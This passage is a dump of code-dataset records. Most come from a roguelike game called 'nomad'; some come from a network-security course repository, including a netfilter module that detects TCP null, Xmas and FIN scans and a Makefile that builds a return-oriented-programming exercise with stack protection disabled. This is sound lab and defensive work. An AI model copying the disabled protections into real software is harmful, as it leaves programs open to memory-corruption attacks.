exit...\")\n\t\t\t\tprint(\"::Deleting temp fingerprint file\")\n\t\t\t\tos.remove(FILEPATH)\n\n\t\t\t\tch=input(\"Do you want to kill tor? (y/n)\")\n\t\t\t\tif(ch=='y' or ch=='Y'):\n\t\t\t\t\tprint(\"::Killing tor\")\n\t\t\t\t\targs= (\"systemctl\" , \"stop\", \"tor\")\n\t\t\t\t\tpopen = subprocess.Popen(args, stdout=subprocess.PIPE)\n\n\texcept stem.SocketError as er:\n\t\tprint(\"Error: \", er, \"\\nTry starting tor service.\")\n\n\t# finally:\n\t\t# tor_p.kill()"
},
{
"alpha_fraction": 0.6226415038108826,
"alphanum_fraction": 0.7358490824699402,
"avg_line_length": 16.33333396911621,
"blob_id": "3755f1470c0114db921226ed1ad53edc1ca3ce42",
"content_id": "63bd114267010263d064c22fbd56a99cfe31559f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 53,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 3,
"path": "/Exercise_1/VM_Files/VM1/start-network",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\nip link set dev enp0s17 up\ndhcpcd enp0s17 \n"
},
{
"alpha_fraction": 0.6422685384750366,
"alphanum_fraction": 0.6446921825408936,
"avg_line_length": 26.891891479492188,
"blob_id": "9f9db01cb411e936f722a772a234aff6ff885b3a",
"content_id": "e6075ad91205062ce228cb3f3ec5c7e90265edd5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 2063,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 74,
"path": "/Assignment_1/module/my_net_module.c",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "#include <linux/init.h>\n#include <linux/module.h>\n#include <linux/kernel.h>\n#include <linux/netfilter.h>\n#include <linux/netfilter_ipv4.h>\n#include <linux/ip.h>\n#include <linux/tcp.h>\n#include <net/netfilter/nf_conntrack.h>\n\nMODULE_LICENSE(\"GPL\");\nMODULE_AUTHOR(\"Manavjeet Singh\");\nMODULE_DESCRIPTION(\"A netfilter hook module.\");\nMODULE_VERSION(\"1.0\");\n\nstatic struct nf_hook_ops *my_nf_hook = NULL;\n\nstatic unsigned int hook_pre_route(void *priv, struct sk_buff *skb, const struct nf_hook_state *state) {\n\tstruct iphdr *iph;\n\tstruct tcphdr *tcph;\n\tif (!skb)\n\t\treturn NF_ACCEPT;\n\n\tiph = ip_hdr(skb);\n\tif (iph->protocol == IPPROTO_TCP) {\n\t\ttcph=tcp_hdr(skb);\n\n\t\tif (!tcph->syn && !tcph->rst && !tcph->psh && !tcph->ack && !tcph->urg && !tcph->ece && !tcph->cwr && !tcph->fin) {\n\t\t\tprintk(KERN_INFO \"TCP null scan packet detected\\n\");\n\t\t\t// return NF_DROP;\n\t\t}\n\t\telse if(!tcph->syn && !tcph->rst && tcph->psh && !tcph->ack && tcph->urg && !tcph->ece && !tcph->cwr && tcph->fin){\n\t\t\tprintk(KERN_INFO \"Xmas scan detected\\n\");\n\t\t\t// return NF_DROP;\n\n\t\t}\n\t\telse if(!tcph->syn && !tcph->rst && !tcph->psh && !tcph->ack && !tcph->urg && !tcph->ece && !tcph->cwr && tcph->fin){\n\t\t\tprintk(KERN_INFO \"Fin scan detected\\n\");\n\t\t\t// return NF_DROP;\n\t\t}\n\n\t}\n\n\t\n\treturn NF_ACCEPT;\n}\n\n\nstatic int __init my_net_module_init(void) {\n\tprintk(KERN_INFO \"Initializing my netfilter module\\n\");\n\n\t/*Hook for which connection tracking is not required*/\n\tmy_nf_hook = (struct nf_hook_ops*) kzalloc(sizeof(struct nf_hook_ops), GFP_KERNEL);\n\n\tmy_nf_hook->hook \t\t\t= (nf_hookfn*)hook_pre_route;\t/* hook function */\n\tmy_nf_hook->hooknum \t\t= NF_INET_PRE_ROUTING;\t\t\t/* received packets */\n\tmy_nf_hook->pf \t\t\t\t= PF_INET;\t\t\t\t\t\t/* IPv4 */\n\tmy_nf_hook->priority \t\t= NF_IP_PRI_FIRST;\t\t\t\t/* max hook priority */\n\n\tnf_register_net_hook(&init_net, my_nf_hook);\n\n\n\n\treturn 0;\n}\n\nstatic void __exit my_net_module_exit(void) {\n\n\tnf_unregister_net_hook(&init_net, my_nf_hook);\n\tkfree(my_nf_hook);\n\tprintk(KERN_INFO \"Exiting my netfilter module\\n\");\n}\n\nmodule_init(my_net_module_init);\nmodule_exit(my_net_module_exit);"
},
{
"alpha_fraction": 0.6692913174629211,
"alphanum_fraction": 0.7007874250411987,
"avg_line_length": 24.600000381469727,
"blob_id": "2d74cc7fbaeeceec62bd3e1955951211d572fbd5",
"content_id": "3b476031e964b93966899c79dd9086fda9b0d79d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 127,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 5,
"path": "/Assignment_2/return_oriented_programming/Makefile",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "sample:\n\tgcc sample.c -o buffover -fno-stack-protector -w -m32 -g\n\nbonus:\n\tgcc bonus.c -o write -fno-stack-protector -w -m32 -g"
},
{
"alpha_fraction": 0.6747967600822449,
"alphanum_fraction": 0.6747967600822449,
"avg_line_length": 17.846153259277344,
"blob_id": "274830896199e8bf2aaca7cfdc30cceb6576a500",
"content_id": "c7dd699cabbfdddeb28316784b99d278d2c0af03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 246,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 13,
"path": "/Assignment_1/Submission/Makefile",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "obj-m += my_net_module.o\n\nall:\n\tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules\n\ninsert: all\n\tsudo insmod my_net_module.ko\n\nremove: \n\tsudo rmmod my_net_module.ko\n\nclean:\n\tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean\n\n"
}
] | 18 |
dustinrohde/nomad
|
https://github.com/dustinrohde/nomad
|
7385ca7faaa6395b9690ba9cabc8d732d07e8d98
|
cd2e8bf88d3d77f350dff38818fff9df0ebb5211
|
fe75bb7194d21056bd9a8c5ba40b63dd3b93e7a3
|
refs/heads/master
| 2021-01-19T12:32:44.189442 | 2016-01-08T22:09:44 | 2016-01-08T22:09:44 | 4,158,439 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5359833240509033,
"alphanum_fraction": 0.5391889810562134,
"avg_line_length": 31.82631492614746,
"blob_id": "83daaf21510ab06277fa34f96e60212429698ac2",
"content_id": "1aa449c1a7ccea2c494872833328e5ccd998829a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6239,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 190,
"path": "/nomad/plains.py",
"repo_name": "dustinrohde/nomad",
"src_encoding": "UTF-8",
"text": "'''the dynamically generated world in which Nomad takes place'''\nfrom nomad.entity import Entity\nfrom nomad.util import *\n\nclass Plains:\n '''A shifting world that generates itself as it moves.'''\n\n def __init__(self, entities, floor_entity, generate):\n self.entities = entities\n self.floor_entity = floor_entity\n self.generate = generate\n\n self._init_entities(self.entities)\n\n @classmethod\n def with_floor(cls, floor_entity, generate, *shape_args, **shape_kws):\n shape_kws['default'] = lambda: [floor_entity()] \n return cls(Octagon(*shape_args, **shape_kws),\n floor_entity, generate)\n\n @staticmethod\n def _iter_entities(entities):\n for (x, y), ents in entities.items():\n for z, e in enumerate(ents):\n yield (x, y, z), e\n\n def _inform_entity(self, entity, x, y, z):\n '''Inform an entity of its xy positon.'''\n assert self.entities.in_bounds(x, y)\n entity.x = x\n entity.y = y \n entity.z = z\n\n def _inform_entities(self, entities):\n '''Inform many entities of their xy positions.'''\n for point, entity in self._iter_entities(entities):\n self._inform_entity(entity, *point)\n\n def _init_entity(self, entity, x, y, z):\n entity.plains = self\n self._inform_entity(entity, x, y, z)\n\n def _init_entities(self, entities):\n for (x, y, z), e in self._iter_entities(entities):\n self._init_entity(e, x, y, z)\n\n def walkable_at(self, x, y):\n '''Are all entities walkable at point (x, y)?'''\n xy = (x, y)\n return (xy in self.entities and\n all(e.walkable for e in self.entities[xy]))\n\n def get_entity(self, x, y, z=-1):\n '''Return the entity at the given coordinates on this plains.'''\n return self.entities[(x, y)][z]\n\n def get_entities(self):\n '''Yield each entity on this plains in an arbitrary order.'''\n for ents in self.entities.values():\n for ent in ents:\n yield ent\n\n def get_coords(self):\n '''Yield an x, y, z triplet for each coordinate on this plains.'''\n for (x, y), ents in self.entities.items():\n for z in range(len(ents)):\n yield x, y, z\n\n def z_in_bounds(self, x, y, z):\n '''Does an entity exist at (x, y, z)?'''\n return 0 <= z < len(self.entities[(x, y)])\n \n def add_entity(self, entity, x, y, z=-1):\n '''Add an entity at the given x, y, z. If z is -1, append it to\n the top.\n '''\n entities = self.entities[(x, y)]\n\n # If z is -1, append entity to the top.\n if z == -1:\n entities.append(entity)\n z = len(entities) - 1\n # Else, if z is in bounds, insert entity at z.\n elif self.z_in_bounds(x, y, z):\n entities.insert(z, entity)\n # Update z coords of above entities.\n for entity in entities[z:]:\n entity.z += 1\n # Otherwise, terminate.\n else:\n return\n # Initialize the entity at its new position.\n self._init_entity(entity, x, y, z)\n\n def pop_entity(self, x, y, z=-1):\n '''Remove and return the entity at the given x, y, z. If z is -1,\n pop the topmost entity.\n '''\n return self.entities[(x, y)].pop(z)\n\n def remove_entity(self, entity):\n entities = self.entities[entity.pos]\n z = entity.z\n # Delete the entity at its x, y, z position.\n del entities[z]\n # Update z coords of above entities.\n for entity in entities[z:]:\n entity.z -= 1\n\n def move_entity(self, entity, x, y, z=-1):\n '''Remove the entity at (x1, y1, z1) and add it to (x2, y2, z2).'''\n self.remove_entity(entity)\n self.add_entity(entity, x, y, z)\n\n def shift(self, dx, dy):\n assert dx or dy\n gen_coords = set()\n\n # Shift all entities by (dx, dy).\n entities = Octagon(*self.entities.params)\n for (x, y), ents in self.entities.items():\n new_point = Point(x + dx, y + dy)\n # Only move entity if new point is in bounds.\n if self.entities.in_bounds(*new_point):\n entities[new_point] = ents\n else:\n gen_coords.add(Point(-x, -y))\n\n # Generate new entities to fill open edge.\n new_entities = self.generate(self, gen_coords)\n self._init_entities(new_entities)\n self._inform_entities(entities)\n entities.update(new_entities)\n self.entities = entities\n\n\nclass Octagon(dict):\n '''A mapping of (x, y) tuples to arbitrary values. The coordinates\n form an octagon.\n\n `Properties`\n `up` : int\n Lower y boundary.\n `down` : int\n Upper y boundary.\n `left` : int\n Lower x boundary.\n `right` : int\n Upper x boundary.\n `ul` : `Point`\n Upper Left diagonal boundary.\n `ur` : `Point`\n Upper Right diagonal boundary.\n `lr` : `Point`\n Lower Right diagonal boundary.\n `ll` : `Point`\n Lower Left diagonal boundary.\n '''\n\n def __init__(self, up, right, down, left, ul, ur, lr, ll,\n default=lambda: None):\n self.up = up\n self.right = right\n self.down = down\n self.left = left\n self.ul = ul\n self.ur = ur \n self.lr = lr\n self.ll = ll\n self.default = default\n\n self.params = (up, right, down, left, ul, ur, lr, ll, default)\n\n for y in range(self.up, self.down + 1):\n for x in range(self.left, self.right + 1):\n if self.in_bounds(x, y):\n self[Point(x, y)] = default()\n\n def in_bounds(self, x, y):\n if x < self.left: return False\n if x > self.right: return False\n if y < self.up: return False\n if y > self.down: return False\n\n if x - self.ul.x < self.ul.y - y: return False\n if x - self.ur.x < y - self.ur.y: return False\n if x - self.ll.x > y - self.ll.y: return False\n if x - self.lr.x > self.lr.y - y: return False\n\n return True\n\n\n"
},
{
"alpha_fraction": 0.5649546980857849,
"alphanum_fraction": 0.5709969997406006,
"avg_line_length": 28.205883026123047,
"blob_id": "457c487036c7d754419dbb717533d254c04158b0",
"content_id": "5ca59c0f263c55e0bd5e015eb028ad7d7048acde",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 993,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 34,
"path": "/nomad/plainsgen.py",
"repo_name": "dustinrohde/nomad",
"src_encoding": "UTF-8",
"text": "'''algorithms for dynamic generation of the plains'''\nimport random as rand\n\nfrom nomad.util import *\n\ndef background():\n def generate(plains, edge_coords):\n return dict((xy, [plains.floor_entity()]) for xy in edge_coords)\n return generate\n\n\ndef random(*entities):\n def generate(plains, edge_coords):\n new_ents = {}\n for xy in edge_coords:\n new_ents[xy] = [plains.floor_entity(), rand.choice(entities)()]\n return new_ents\n return generate\n\n\ndef chance(prob2ent):\n probs = sorted(prob2ent.keys(), key=lambda x: x + rand.random())\n def generate(plains, edge_coords):\n new_ents = {}\n for xy in edge_coords:\n new_ents[xy] = [plains.floor_entity()]\n roll = rand.random()\n for prob in probs:\n if roll * 100 <= prob:\n entity = prob2ent[prob]\n new_ents[xy].append(entity())\n break\n return new_ents\n return generate\n"
},
{
"alpha_fraction": 0.5888985395431519,
"alphanum_fraction": 0.6053772568702698,
"avg_line_length": 24.065217971801758,
"blob_id": "0676cf77ffb75fc7d845f79319f54d3d109c1fed",
"content_id": "9ffe1c30efafbc37b19feca9b59f76ad53d54247",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1153,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 46,
"path": "/nomad/entities.py",
"repo_name": "dustinrohde/nomad",
"src_encoding": "UTF-8",
"text": "'''entity definitions'''\nimport random\n\nfrom nomad.entity import Entity\nfrom nomad.roles import *\nfrom nomad.util import DIRECTIONS\n\ndef shuffle(actor, nomad):\n dx, dy = random.choice(DIRECTIONS)\n actor.move(dx, dy)\n\ndef strike(tool, actor, target):\n target.damage(tool.as_matter.weight)\n\n\ndef earth(): return Entity(\n 'earth', True, False)\ndef rock(): return Entity(\n 'rock', False)\n\ndef grass(): return Entity(\n 'grass', True, roles={\n 'edible': Edible(0, -5)})\ndef flower(): return Entity(\n 'flower', True, roles={\n 'edible': Edible(0, -1)}) \ndef mushroom(): return Entity(\n 'mushroom', True, roles={\n 'edible': Edible(10, 1)})\n\ndef stick(): return Entity(\n 'stick', True, roles={\n 'matter': Matter(25, 25),\n 'usable': Usable(strike)})\ndef sharp_rock(): return Entity(\n 'sharp rock', True, roles={\n 'matter': Matter(25, 25),\n 'usable': Usable(strike)})\ndef spear(): return Entity(\n 'spear', True, roles={\n 'matter': Matter(25, 25),\n 'usable': Usable(strike)})\n\ndef yak(): return Entity(\n 'yak', False, False, roles={\n 'actor': Actor(shuffle)})\n"
},
{
"alpha_fraction": 0.5983379483222961,
"alphanum_fraction": 0.5983379483222961,
"avg_line_length": 29.08333396911621,
"blob_id": "eeeeeb63bdbd2ea8c1d2d3b881abb191a010376b",
"content_id": "37ce7c905b090f7d76dc82465ac6534277cf5aaa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 1083,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 36,
"path": "/TODO.rst",
"repo_name": "dustinrohde/nomad",
"src_encoding": "UTF-8",
"text": "N O M A D <> T O D O\n-------------------------------------------------\n\nTidy up.\n^^^^^^^^^\n\n #) Fix Plains.shift so that it creates a perfectly symmetrical\n octogon.\n\n\nImplement weapons.\n^^^^^^^^^^^^^^^^^^\n\n #) Implement death for mortals and mulching for usable objects.\n\n #) Implement different mechanics for fleshy creatures and objects.\n Perhaps use the Matter role for this.\n\n\nImplement hunting.\n^^^^^^^^^^^^^^^^^^\n\n #) Implement corpses.\n When a fauna is killed, its corpse is left behind.\n A corpse can be cut while standing over it and wielding a sharp\n edge.\n\n #) Implement meat, hides and bones.\n When a corpse is cut, a stack of meat, hides and bones is left.\n Meat has high satiation. Hides can be used to make clothing and\n bags. Bones can be used to make a sharp edge.\n\n #) Write ``Mortal.throw`` method.\n Throws a held entity at a given target. Power and speed are\n determined by STR, and accuracy by AGL.\n Target selection mirrors Stone Soup's approach.\n"
},
{
"alpha_fraction": 0.5822434425354004,
"alphanum_fraction": 0.5860901474952698,
"avg_line_length": 27.256521224975586,
"blob_id": "96b066b92c055d28c1069df62677d5414b9fb6e6",
"content_id": "8c550fe0ec1e53c13b19ded3397f0ed0cf462a2b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6499,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 230,
"path": "/nomad/roles.py",
"repo_name": "dustinrohde/nomad",
"src_encoding": "UTF-8",
"text": "'''entity behaviors'''\nfrom collections import OrderedDict\n\nclass Role:\n '''Abstract class for `Entity` behaviors.'''\n\n def __init__(self):\n self.entity = None\n\n def assign(self, entity):\n '''Assign this role to an entity.'''\n self.entity = entity\n\n def __getattr__(self, *args, **kwargs):\n '''If an attribute is not found on the role, search its entity.\n\n A role must be assigned with `Role.assign` before this will work.\n '''\n return getattr(self.entity, *args, **kwargs)\n\n def update(self, nomad):\n '''Update the entity assigned to this role, given a `Nomad`.\n \n This method is called each turn of the game.\n '''\n pass\n \n def damage(self, dmg):\n '''Cause damage to the entity assigned to this role.\n \n Return True if damage was dealt, else False.\n '''\n return False\n\n\nclass Matter(Role):\n '''Something with physical properties.'''\n\n def __init__(self, weight, edge):\n self.weight = weight\n self.edge = edge\n\n\nclass Edible(Role):\n '''Something that can be eaten, for good or ill.'''\n\n def __init__(self, satiation, nutrition):\n super().__init__()\n self.satiation = satiation\n self.nutrition = nutrition\n\n\nclass Usable(Role):\n '''Something that can be \"used\" on another Entity.'''\n\n def __init__(self, on_use):\n super().__init__()\n self.on_use = on_use\n\n def use_on(self, entity):\n '''Use the usable on another entity.'''\n self.on_use(self, entity)\n\n\nclass Weapon(Role):\n '''A tool for killing.'''\n\n def __init__(self, damage, accuracy, nhits):\n self.damage = damage\n self.accuracy = accuracy\n self.nhits = nhits\n\n def use_on(self, entity):\n for i in range(self.nhits):\n if random() * 100 > self.accuracy:\n continue\n entity.damage(self.damage)\n\n\nclass Actor(Role):\n '''Something that acts each turn.'''\n\n def __init__(self, action):\n super().__init__()\n self.action = action\n\n def update(self, nomad):\n '''Perform an action.'''\n self.action(self.entity, nomad)\n\n\nclass Reactor(Role):\n '''Something that reacts when engaged with.'''\n\n def __init__(self, action):\n super().__init__()\n self.action = action\n\n def react_to(self, entity):\n '''Perform an action in response to an Entity.'''\n self.action(self.entity, entity)\n\n\nclass Mortal(Role):\n '''Something that can die and requires sustainance to stay alive.'''\n\n MIN_SATIATION = 0\n MAX_SATIATION = 100\n MIN_HEALTH = 0\n MAX_HEALTH = 100\n\n SATIATION_DECAY = 0.25\n\n def __init__(self, satiation=MAX_SATIATION, health=MAX_HEALTH):\n super().__init__()\n self._satiation = satiation\n self._health = health\n\n def update(self, nomad):\n '''Reduce satiation by a fixed amount.'''\n self.satiation -= self.SATIATION_DECAY\n\n def damage(self, dmg):\n if not self.health:\n return False\n self.health -= dmg\n return True\n\n @property\n def alive(self):\n '''Is the mortal alive?'''\n return self.satiation > 0\n\n def _get_satiation(self):\n return self._satiation\n def _set_satiation(self, x):\n self._satiation = max(self.MIN_SATIATION, min(self.MAX_SATIATION, x))\n satiation = property(_get_satiation, _set_satiation, doc=\n 'How full is the mortal? If this reaches 0, death occurs.')\n\n def _get_health(self):\n return self._health\n def _set_health(self, x):\n self._health = max(self.MIN_HEALTH, min(self.MAX_HEALTH, x))\n health = property(_get_health, _set_health, doc=\n 'How healthy is the mortal? If this reaches 0, death occurs.')\n\n def eat(self, entity):\n '''Attempt to eat an entity. Return True if successful, else False.'''\n edible = entity.as_edible\n if edible:\n self.satiation = self.satiation + edible.satiation\n self.health = self.health + edible.nutrition\n return True\n return False\n\n def eat_nearest(self):\n entity = self.select_in_reach()\n if entity and self.as_mortal.eat(entity):\n self.plains.remove_entity(entity)\n\n\nclass Tactile(Role):\n '''Something that has fine motor control.'''\n\n def __init__(self, object_factory, left_held=None, right_held=None):\n super().__init__()\n self.object_factory = object_factory\n self.held_entities = [left_held, right_held]\n\n def assign(self, entity):\n super().assign(entity)\n\n def eat_nearest(self):\n for i, entity in enumerate(self.held_entities):\n if entity and self.as_mortal.eat(entity):\n self.held_entities[i] = None\n return\n self.as_mortal.eat_nearest()\n\n def pickup_nearest(self):\n # Get closest entity in reach.\n entity = self.select_in_reach()\n\n # Quit if entity unmoveable.\n if not entity or not entity.moveable:\n return\n\n # Put entity in a free hand, or quit if there isn't one.\n if self.held_entities[0] is None:\n self.held_entities[0] = entity\n elif self.held_entities[1] is None:\n self.held_entities[1] = entity\n else:\n return\n\n # Remove the entity from the plains.\n self.plains.remove_entity(entity)\n\n def drop_left(self):\n '''Drop the entity in the tactile's left hand underfoot.'''\n self.put_underfoot(self.held_entities[0])\n self.held_entities[0] = None\n\n def drop_right(self):\n '''Drop the entity in the tactile's right hand underfoot.'''\n self.put_underfoot(self.held_entities[1])\n self.held_entities[1] = None\n\n def drop_all(self):\n '''Drop all entities held by the tactile.'''\n self.drop_left()\n self.drop_right()\n\n def combine_objects(self):\n '''Attempt to make a usable with the entities on hand.'''\n parts = frozenset(part.name for part in self.held_entities if part)\n\n if parts not in self.object_factory:\n return\n\n min_intelligence, usable = self.object_factory[parts]\n if self.stats.intelligence < min_intelligence:\n return\n\n for i, part in enumerate(self.held_entities):\n if part.name() in parts:\n self.held_entities[i] = None\n \n self.put_underfoot(usable())\n"
},
{
"alpha_fraction": 0.5519005656242371,
"alphanum_fraction": 0.5789473652839661,
"avg_line_length": 26.918367385864258,
"blob_id": "aa24670b0bd1b6b3c11ef7f771acbab47e7d8675",
"content_id": "4b0f6231e9f0dd639ec9f1177c833b13c4c4ee1c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1368,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 49,
"path": "/nomad/util.py",
"repo_name": "dustinrohde/nomad",
"src_encoding": "UTF-8",
"text": "import math\nfrom collections import namedtuple\n\nDIR_UP = (0, -1)\nDIR_DOWN = (0, 1)\nDIR_LEFT = (-1, 0)\nDIR_RIGHT = (1, 0)\nDIR_UPLEFT = (-1, -1)\nDIR_UPRIGHT = (1, -1)\nDIR_DOWNLEFT = (-1, 1)\nDIR_DOWNRIGHT = (1, 1)\nDIRECTIONS = (DIR_UP, DIR_DOWN, DIR_LEFT, DIR_RIGHT,\n DIR_UPLEFT, DIR_UPRIGHT, DIR_DOWNLEFT, DIR_DOWNRIGHT)\n\nPoint = namedtuple('Point', 'x y')\n\ndef edge_coord(origin, radius, trig_func, degrees):\n return origin + radius * trig_func(degrees * math.pi / 180) \n\ndef edge_point(origin_x, origin_y, radius, degrees):\n return (edge_coord(origin_x, radius, math.cos, degrees),\n edge_coord(origin_y, radius, math.sin, degrees))\n\n\ndef points_in_circle(radius):\n for y in range(-radius, radius):\n for x in range(-radius, radius):\n if distance(0, 0, x, y) < radius:\n yield Point(x, y)\n\n\ndef points_in_octagon(side):\n points = set()\n size = side * 3\n half_size = size // 2\n half_side = side // 2\n for y in range(-half_size - 1, half_size + 1):\n x1 = -half_side - (side - abs(y))\n x2 = half_side + (side - abs(y)) + 1\n for x in range(x1, x2):\n points.add((x, y))\n return points\n\n\ndef distance(x, y, x2, y2):\n return math.sqrt(((x2 - x) ** 2) + ((y2 - y) ** 2))\n\ndef flatten_keys(d):\n return dict((key, v) for keys, v in d.items() for key in keys)\n"
},
{
"alpha_fraction": 0.5472432971000671,
"alphanum_fraction": 0.5546218752861023,
"avg_line_length": 28.93251609802246,
"blob_id": "c6075350964fcb6b24e1782aa37b251af436194a",
"content_id": "897c9b33ba2802c24bd5236514e11336945615a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4879,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 163,
"path": "/nomad/game.py",
"repo_name": "dustinrohde/nomad",
"src_encoding": "UTF-8",
"text": "'''run the game'''\nimport curses\nfrom curses import KEY_LEFT, KEY_RIGHT, KEY_UP, KEY_DOWN\nfrom functools import partial\n\nfrom nomad.entities import *\nfrom nomad import interface\nfrom nomad.interface import *\nfrom nomad.nomad import Nomad\nfrom nomad.plains import Plains\nimport nomad.plainsgen as gen\nfrom nomad.util import *\n\n# Subwindow dimensions as (height, width, y, x)\nPLAINS_WIN = (21, 21, 1, 1)\nSTATUS_WIN = (21, 21, 0, 22)\n\n\ndef run():\n '''Initialize curses and call `main`.'''\n stdscr = curses.initscr()\n curses.start_color()\n curses.use_default_colors()\n curses.curs_set(0)\n curses.wrapper(main)\n curses.curs_set(1)\n\n\ndef main(stdscr): \n '''Run the game, given a curses ``stdscr``.'''\n init_color_pairs()\n\n # Define the nomad.\n nomad = Nomad(los=6)\n # Define the plains.\n los = nomad.los\n half_los = los // 2 + 1\n plains = Plains.with_floor(earth,\n gen.chance(\n {90: grass, 10: flower,\n 3: mushroom, 5: stick,\n 2: sharp_rock, 1: yak}),\n up=-los, left=-los, right=los, down=los,\n ul=Point(-half_los, -half_los),\n ur=Point(-half_los, half_los),\n lr=Point(half_los, half_los),\n ll=Point(half_los, -half_los),)\n # Add nomad to plains.\n plains.add_entity(nomad, 0, 0)\n\n # Make windows.\n plains_win = curses.newwin(*PLAINS_WIN) \n status_win = curses.newwin(*STATUS_WIN)\n # Get rendering data.\n display_dict = render_info()\n # Get keybindings.\n command_dict = player_commands()\n # Initialize user interface.\n interface.ui = interface.Interface(stdscr, plains_win, status_win,\n nomad, display_dict, command_dict)\n\n # Execute the main loop while the nomad lives.\n while nomad.as_mortal.alive:\n # Update the screen.\n interface.ui.update_plains_window()\n interface.ui.update_status_window()\n\n # Get and handle user input.\n interface.ui.interact()\n\n # Update all entities.\n update_entities(nomad, plains)\n\n # Game over.\n game_over(stdscr, nomad)\n\n\ndef update_entities(nomad, plains):\n '''Update each `Entity` in the `Plains` with the `Nomad`.'''\n for entity in plains.get_entities():\n entity.update(nomad)\n\n\ndef game_over(stdscr, nomad):\n '''End the game.'''\n stdscr.clear()\n stdscr.addstr(0, 0, \"Game over.\")\n stdscr.addstr(1, 0, \"The nomad's journey has ended.\") \n stdscr.getch()\n curses.endwin()\n\n\ndef player_commands():\n '''Return a dict mapping curses key values to functions that\n should be called when those keys are pressed.\n\n Each function should take a `Nomad` as its single argument.\n '''\n\n def make_move_nomad(dx, dy):\n def move_nomad(nomad):\n nomad.move(dx, dy)\n return move_nomad\n\n # Assign movement keys (from `interface.key_to_dir`).\n commands = dict((key, make_move_nomad(*d))\n for key, d in key_to_dir.items())\n\n def eat_nearest(nomad):\n nomad.as_tactile.eat_nearest()\n\n def pickup_nearest(nomad):\n nomad.as_tactile.pickup_nearest()\n\n def drop_all(nomad):\n nomad.as_tactile.drop_all()\n\n def combine_objects(nomad):\n nomad.as_tactile.combine_objects()\n\n # Assign all other single-key actions.\n commands.update({\n ord('w'): Nomad.wait,\n ord('e'): eat_nearest,\n ord('g'): pickup_nearest,\n ord('d'): drop_all,\n ord('c'): combine_objects,\n })\n\n return commands\n\n\ndef render_info():\n '''Return a dict mapping entity names to rendering data.\n\n Each value is of the form (char, pair_num) where char is the\n character to render and pair_num is a curses color pair number 0-9.\n '''\n return {\n 'nomad': ('@', PAIR_YELLOW),\n 'grass': ('\"', PAIR_GREEN),\n 'flower': ('*', PAIR_BLUE),\n 'earth': ('.', PAIR_WHITE),\n 'rock': ('0', PAIR_CYAN),\n 'yak': ('Y', PAIR_RED),\n 'mushroom': ('?', PAIR_MAGENTA),\n 'sharp rock': ('>', PAIR_CYAN),\n 'stick': ('/', PAIR_WHITE),\n 'spear': ('|', PAIR_YELLOW),\n }\n\n\ndef init_color_pairs():\n '''Initialize curses color pairs.'''\n for (n, fg_color) in (\n (PAIR_RED, curses.COLOR_RED),\n (PAIR_GREEN, curses.COLOR_GREEN),\n (PAIR_YELLOW, curses.COLOR_YELLOW),\n (PAIR_BLUE, curses.COLOR_BLUE),\n (PAIR_MAGENTA, curses.COLOR_MAGENTA),\n (PAIR_CYAN, curses.COLOR_CYAN),\n (PAIR_WHITE, curses.COLOR_WHITE)):\n curses.init_pair(n, fg_color, -1)\n"
},
{
"alpha_fraction": 0.5684124231338501,
"alphanum_fraction": 0.5711543560028076,
"avg_line_length": 29.383333206176758,
"blob_id": "3afbc56a667cff90577d04b80d12eb8f28de0754",
"content_id": "58ec92f889fcb2a78a0c44d198a1d43e65baa892",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3647,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 120,
"path": "/nomad/entity.py",
"repo_name": "dustinrohde/nomad",
"src_encoding": "UTF-8",
"text": "'''things that exist in the plains'''\nfrom collections import OrderedDict, namedtuple\nfrom itertools import chain\n\nfrom nomad import interface\nfrom nomad.util import DIRECTIONS\n\nclass Stats:\n\n def __init__(self, strength, agility, intelligence):\n self.strength = strength\n self.agility = agility\n self.intelligence = intelligence\n\n\nclass Entity:\n '''A thing that exists in the plains.'''\n\n def __init__(self, name, walkable, moveable=True,\n stats=Stats(strength=1.0, agility=1.0, intelligence=1.0),\n roles={}):\n self.name = name\n self.walkable = walkable\n self.moveable = moveable\n self.stats = stats\n\n self.roles = roles\n for role in self.roles.values():\n role.assign(self)\n\n self.held_entities = []\n\n self.x = None\n self.y = None\n self.z = None\n self.plains = None\n\n def __str__(self):\n '''Return the entity's name.'''\n return self.name\n\n def get_role(self, role_name):\n return self.roles.get(role_name, None)\n\n as_matter = property(lambda self: self.get_role('matter'))\n as_edible = property(lambda self: self.get_role('edible'))\n as_usable = property(lambda self: self.get_role('usable'))\n as_actor = property(lambda self: self.get_role('actor'))\n 